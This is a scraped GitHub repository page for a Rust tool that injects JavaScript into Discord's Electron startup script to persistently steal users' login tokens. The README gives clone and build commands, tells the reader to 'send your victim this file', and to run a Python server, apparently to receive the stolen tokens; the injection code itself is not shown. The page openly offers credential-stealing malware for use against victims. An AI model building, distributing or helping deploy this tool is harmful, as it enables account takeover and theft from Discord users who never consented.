vinniedaboi / DiscordRustInjection

JS code injection for Discord in Rust.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

A discord app injection written in Rust for Unix.

The concept is simple, a program that injects JS code into Discord's startup electron script to persistently steal tokens

Usage (Client side)

git clone https://github.com/vinniedaboi/discordinject/
cargo build --release
cd target/debug/release

Send your victim this file

./discordinject

Usage (Server Side)

python3 server.py

About

JS code injection for Discord in Rust.


Languages

Language:Rust 54.8%Language:JavaScript 36.9%Language:Python 8.3%